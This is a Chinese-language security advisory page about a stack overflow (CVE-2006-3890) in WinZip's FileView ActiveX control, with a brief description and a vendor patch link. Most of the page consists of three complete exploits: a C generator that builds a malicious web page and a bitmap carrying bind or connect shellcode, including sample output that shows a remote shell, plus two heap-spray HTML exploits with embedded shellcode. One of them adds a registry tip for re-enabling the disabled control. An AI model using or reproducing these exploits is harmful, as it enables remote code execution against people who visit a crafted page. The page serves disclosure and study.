首页 -> 安全研究
安全研究
安全漏洞
WinZip FileView ActiveX控件远程栈溢出漏洞
发布日期:2006-11-14
更新日期:2006-11-17
受影响系统:
WinZip WinZip 10.0不受影响系统:
WinZip WinZip 10.0 Build 7245描述:
BUGTRAQ ID: 21060
CVE(CAN) ID: CVE-2006-3890
WinZip是一款流行的文件压缩/解压工具。
WinZip的FileView ActiveX控件(WZFILEVIEW.FileViewCtrl.61,CLSID为A09AE68F-B14D-43ED-B713-BA413F034904)中存在栈溢出漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意指令。
如果用户受骗访问了包含有恶意控件的站点的话,就会触发这个漏洞,导致执行任意代码。
<*来源:Micheal Turner (wh1t3h4t3@yahoo.co.uk)
ZDI (http://www.zerodayinitiative.com/)
链接:http://secunia.com/advisories/22891/
http://marc.theaimsgroup.com/?l=full-disclosure&m=116360068230233&w=2
http://www.zerodayinitiative.com/advisories/ZDI-06-040.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
* ===============================================================
* A vulnerability has been identified within Winzip that allows remote
* attackers to execute arbitrary code. User interaction is required to
* exploit this vulnerability in that the target must visit a malicious
* web page. The flaw exists within "FileView" ActiveX control which
* contains stack based overflow conditions. This exploit generates a
* malicious html page and contains shellcode embedded within an image
* file. Due to the random nature of the heap, this exploit uses hard
* coded location of the image bytes within the heap and as such is
* unreliable in exploitation of this bug, but has approximately 1 in
* 6 hit ratio within the tested environment.
*
* Example.
* $ ./prdelka-vs-MS-winzip -f index.html -i foo.bmp -s 0 -t 0
* [ WinZip 10 <= 10.0.7245 FileView ActiveX overflow exploit
* [ Using shellcode 'Win32 x86 bind() shellcode (4444/tcp default)' (400 bytes)
* [ Using target 'WinXP SP2(en) WinZIP 10.0.6667'
* [ Creating image containing shellcode 'foo.bmp'
* [ Creating html exploit page 'index.html'
* $
* ... clicky clicky MSIE ...
* $ telnet 192.168.1.223 4444
* Connected to 192.168.1.223.
* Escape character is '^]'.
*
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\Documents and Settings\User\Desktop>
*
* - prdelka
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <getopt.h>
#define NOPSIZE 999999
struct target {
char* name;
int retaddr;
};
struct shellcode {
char* name;
short port;
int host;
char* shellcode;
};
int targetno = 1;
struct target targets[] = {
{"WinXP SP2(en) WinZIP 10.0.6667",0x02DA3269}
/* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667)" */
};
int shellno = 2;
struct shellcode shellcodes[] = {
{"Win32 x86 bind() shellcode (4444/tcp default)",162,-1,
"\x48\x40\xf5\x49\xd6\x4a\xf9\x91\x47\x96\x2f\xf8\x9b\x37\x41\xf5"
"\x99\x47\xf9\xf9\xfc\xf9\x48\x4e\x4b\x9b\x90\x9b\xf5\x97\x40\xf9"
"\xd6\x41\xf9\x48\x9b\x92\xfd\x9b\x49\x42\x4f\x9f\x90\xd6\x27\x9b"
"\x93\x46\x2f\x90\xfd\x4a\x6a\x51\x59\xd9\xee\xd9\x74\x24\xf4\x5b"
"\x81\x73\x13\xbc\xe8\x2b\x27\x83\xeb\xfc\xe2\xf4\x3d\x2c\x7f\xd5"
"\x43\x17\xd7\x4d\x57\xa5\xc3\xde\x43\x17\xd4\x47\x37\x84\x0f\x03"
"\x37\xad\x17\xac\xc0\xed\x53\x26\x53\x63\x64\x3f\x37\xb7\x0b\x26"
"\x57\xa1\xa0\x13\x37\xe9\xc5\x16\x7c\x71\x87\xa3\x7c\x9c\x2c\xe6"
"\x76\xe5\x2a\xe5\x57\x1c\x10\x73\x98\xc0\x5e\xc2\x37\xb7\x0f\x26"
"\x57\x8e\xa0\x2b\xf7\x63\x74\x3b\xbd\x03\x28\x0b\x37\x61\x47\x03"
"\xa0\x89\xe8\x16\x67\x8c\xa0\x64\x8c\x63\x6b\x2b\x37\x98\x37\x8a"
"\x37\xa8\x23\x79\xd4\x66\x65\x29\x50\xb8\xd4\xf1\xda\xbb\x4d\x4f"
"\x8f\xda\x43\x50\xcf\xda\x74\x73\x43\x38\x43\xec\x51\x14\x10\x77"
"\x43\x3e\x74\xae\x59\x8e\xaa\xca\xb4\xea\x7e\x4d\xbe\x17\xfb\x4f"
"\x65\xe1\xde\x8a\xeb\x17\xfd\x74\xef\xbb\x78\x74\xff\xbb\x68\x74"
"\x43\x38\x4d\x4f\xad\xb4\x4d\x74\x35\x09\xbe\x4f\x18\xf2\x5b\xe0"
"\xeb\x17\xfd\x4d\xac\xb9\x7e\xd8\x6c\x80\x8f\x8a\x92\x01\x7c\xd8"
"\x6a\xbb\x7e\xd8\x6c\x80\xce\x6e\x3a\xa1\x7c\xd8\x6a\xb8\x7f\x73"
"\xe9\x17\xfb\xb4\xd4\x0f\x52\xe1\xc5\xbf\xd4\xf1\xe9\x17\xfb\x41"
"\xd6\x8c\x4d\x4f\xdf\x85\xa2\xc2\xd6\xb8\x72\x0e\x70\x61\xcc\x4d"
"\xf8\x61\xc9\x16\x7c\x1b\x81\xd9\xfe\xc5\xd5\x65\x90\x7b\xa6\x5d"
"\x84\x43\x80\x8c\xd4\x9a\xd5\x94\xaa\x17\x5e\x63\x43\x3e\x70\x70"
"\xee\xb9\x7a\x76\xd6\xe9\x7a\x76\xe9\xb9\xd4\xf7\xd4\x45\xf2\x22"
"\x72\xbb\xd4\xf1\xd6\x17\xd4\x10\x43\x38\xa0\x70\x40\x6b\xef\x43"
"\x43\x3e\x79\xd8\x6c\x80\x55\xff\x5e\x9b\x78\xd8\x6a\x17\xfb\x27"},
{"Win32 x86 connect() shellcode (4444/tcp default)",167,160,
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68"
"\x01\x02\x03\x04\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xec\xf9"
"\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68"
"\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3"
"\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab"
"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51"
"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6"
"\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6"
"\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"}
};
char html1[]="<HTML>\r\n<HEAD>\r\n<TITLE></TITLE>\r\n</HEAD>\r\n"
"<BODY>\r\n<SCRIPT LANGUAGE=\"VBScript\">\r\nSub WZ"
"FILEVIEW_OnAfterItemAdd(Item)\r\nWZFILEVIEW.FilePa"
"ttern = \""; /* smash the stack here */
char html2[]="\"\r\nend sub\r\n</SCRIPT>\r\n<IMG SRC=\"";
char html3[]="\">\r\n<OBJECT ID=\"WZFILEV"
"IEW\" WIDTH=200 HEIGHT=200\r\nCLASSID=\"CLSID:A09A"
"E68F-B14D-43ED-B713-BA413F034904\">\r\n</OBJECT>\r"
"\n</BODY>\r\n</HTML>\r\n";
char bmphdr[]="\x42\x4d\x3e\xbb\x2d\x00\x00\x00\x00\x00\x36\x00\x00"
"\x00\x28\x00\x00\x00\xe7\x03\x00\x00\xe7\x03\x00\x00"
"\x01\x00\x18\x00\x00\x00\x00\x00\x08\xbb\x2d\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00";
int ret;
void help(char* progname){
int count;
printf("[ Usage instructions.\n[\n");
printf("[ %s <required> (optional)\n[\n[ --filename|-f <file.html>\n",progname);
printf("[ --imgname|-i <image.bmp>\n[ --shellcode|-s <shell#>\n");
printf("[ --shellport|-p (port)\n");
printf("[ --shellhost|-i (ip)\n");
printf("[ --target|-t <target#/0xretaddr>\n[\n");
printf("[ Target#'s\n");
for(count = 0;count <= targetno - 1;count++){
printf("[ %d %s 0x%x\n",count,targets[count],targets[count]);
}
printf("[\n[ Shellcode#'s\n");
for(count = 0;count <= shellno - 1;count++){
printf("[ %d \"%s\" (length %d bytes)\n",count,shellcodes[count].name,strlen(shellcodes[count].shellcode));
}
exit(0);
}
void setret(char* retarg){
int value = atoi(retarg);
switch(value){
case 0:
printf("[ Using target '%s'\n",targets[ret].name);
ret = targets[ret].retaddr;
break;
default:
ret = strtoul(retarg,NULL,16);
printf("[ Using return address '0x%x'\n",ret);
break;
}
}
int main(int argc, char* argv[]){
unsigned long i, fd;
int c, index, payg, paya, lhost;
short shellport, shellport2;
int ishell = 0, itarg = 0;
char *buffer, *file, *img, *payload;
static struct option options[] = {
{"filename", 1, 0, 'f'},
{"imgname", 1, 0, 'i'},
{"target", 1, 0, 't'},
{"shellcode", 1, 0, 's'},
{"shellport", 1, 0, 'p'},
{"shellhost", 1, 0, 'd'},
{"help", 0, 0,'h'}
};
printf("[ WinZip 10 <= 10.0.7245 FileView ActiveX overflow exploit\n");
while(c != -1){
c = getopt_long(argc,argv,"f:i:t:s:p:d:h",options,&index);
switch(c){
case 'f':
file = optarg;
break;
case 'i':
img = optarg;
break;
case 't':
itarg = 1;
setret(optarg);
if(strlen((char*)&ret) < 4){
fprintf(stderr,"[ Selected target contains a null address!\n");
exit(-1);
}
break;
case 's':
if(ishell==0){
payg = atoi(optarg);
switch(payg){
case 0:
printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));
payload = malloc(strlen(shellcodes[payg].shellcode)+1);
memset(payload,0,strlen(shellcodes[payg].shellcode)+1);
memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));
shellport2 = 4444;
ishell = 1;
break;
case 1:
printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));
payload = malloc(strlen(shellcodes[payg].shellcode)+1);
memset(payload,0,strlen(shellcodes[payg].shellcode)+1);
memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));
shellport2 = 4444;
ishell = 1;
break;
default:
printf("[ Invalid shellcode selection %d\n",payg);
exit(0);
break;
}
}
break;
case 'p':
if(ishell==1){
if(shellcodes[payg].port > -1){
paya = strlen(payload);
shellport = atoi(optarg);
shellport2 = shellport;
shellport =(shellport&0xff)<<8 | shellport>>8;
memcpy((void*)&payload[shellcodes[payg].port],&shellport,sizeof(shellport));
if(paya > strlen(payload)) {
printf("[ Error shellcode port introduces null bytes\n");
exit(1);
}
printf("[ Shellcode port changed to '%u'\n",atoi(optarg));
}
else{
printf("[ (%s) port selection is ignored for current shellcode\n",optarg);
}
}
else{
printf("[ No shellcode selected yet, ignoring (%s) port selection\n",optarg);
}
break;
case 'd':
if(ishell==1){
if(shellcodes[payg].host > -1){
paya = strlen(payload);
lhost = inet_addr(optarg);
memcpy((void*)&payload[shellcodes[payg].host],&lhost,sizeof(lhost));
if(paya > strlen(payload)){
printf("[ Error shellhost introduces null bytes\n");
exit(1);
}
printf("[ Shellhost has been changed to '%s'\n",optarg);
}
else{
printf("[ (%s) shellhost selection is ignored for current shellcode\n",optarg);
}
}
else {
printf("[ No shellcode selected yet, ignoring (%s) shellhost selection\n",optarg);
}
break;
case 'h':
help(argv[0]);
break;
default:
break;
}
}
if(ishell==0||itarg==0||strlen(file)==0||strlen(img)==0){
printf("[ Error insufficient arguements, try running '%s --help'\n",argv[0]);
exit(0);
}
// create image
printf("[ Creating image containing shellcode '%s'\n",img);
fd = open(img,O_RDWR|O_CREAT,S_IRWXU);
if(fd == -1){
fprintf(stderr,"[ Error creating %s\n",file);
exit(-1);
}
write(fd,bmphdr,sizeof(bmphdr));
for(i = 0;i < NOPSIZE;i++){
write(fd,"\x90",1);
}
write(fd,payload,strlen(payload));
close(fd);
// create html
printf("[ Creating html exploit page '%s'\n",file);
fd = open(file,O_RDWR|O_CREAT,S_IRWXU);
if(fd == -1){
fprintf(stderr,"[ Error creating %s\n",file);
exit(-1);
}
write(fd,html1,strlen(html1));
for(i = 0;i < 265;i++){
write(fd,"A",1);
}
write(fd,&ret,4);
for(i = 0;i < 1827;i++){
write(fd,"A",1);
}
write(fd,html2,strlen(html2));
write(fd,img,strlen(img));
write(fd,html3,strlen(html3));
close(fd);
}
<!--
prdelka
http://blogs.23.nu/prdelka
I made a version of my winzip exploit that utilises the heap spray
method with a bindshell for some project or other. you can download a
copy here if its of use to you, note i used a different method courtesy
of http://www.milw0rm.com/exploits/3055 - however i couldnt get their
exploit to function. enjoy.
-->
<HTML>
<HEAD>
<meta http-equiv="refresh" content="0">
<TITLE></TITLE>
</HEAD>
<BODY>
<OBJECT ID="WZFILEVIEW" WIDTH=50 HEIGHT=50 CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904"></OBJECT>
<script type="text/javascript">
shellcode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
//bindshell port 28876
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<900;i++) memory[i] = block + shellcode;
var buf = 'A';
while (buf.length < 512) buf+='\x09';
WZFILEVIEW.CreateNewFolderFromName(buf);
</SCRIPT>
</BODY>
</HTML>
<html>
<head>
<object classid="clsid:{A09AE68F-B14D-43ED-B713-BA413F034904}" id="winzip">
</object>
</head>
<body>
<SCRIPT language="javascript">
/*
---===[ winzip-exploit.html
XiaoHui : 76693223[at]163com
HomePage: www.nipc.org.cn
(c) 2006 All rights reserved.
note:Because of the prior vuln in FileView ActiveX Control,Micorsoft has disabled this ActiveX Controls,
To test this vuln,You can delete the key:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A09AE68F-B14D-43ED-B713-BA413F034904}]
"Compatibility Flags"=dword:00000400
I have test the exploit on Windows 2000+sp4(CN) and Windows xp+sp2(CN) and Winzip 10.0(6667),you can tryother version,goodluck~
]===---
*/
var heapSprayToAddress = 0x0d0d0d0d;
var payLoadCode = unescape( "%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
var xh = 'A';
while (xh.length < 231) xh+='A';
xh+="\x0d\x0d\x0d\x0d";
winzip.CreateNewFolderFromName(xh);
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
</script>
</body>
</html>
建议:
厂商补丁:
WinZip
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.winzip.com/wz7245.htm
浏览次数:3371
严重程度:0(网友投票)
绿盟科技给您安全的保障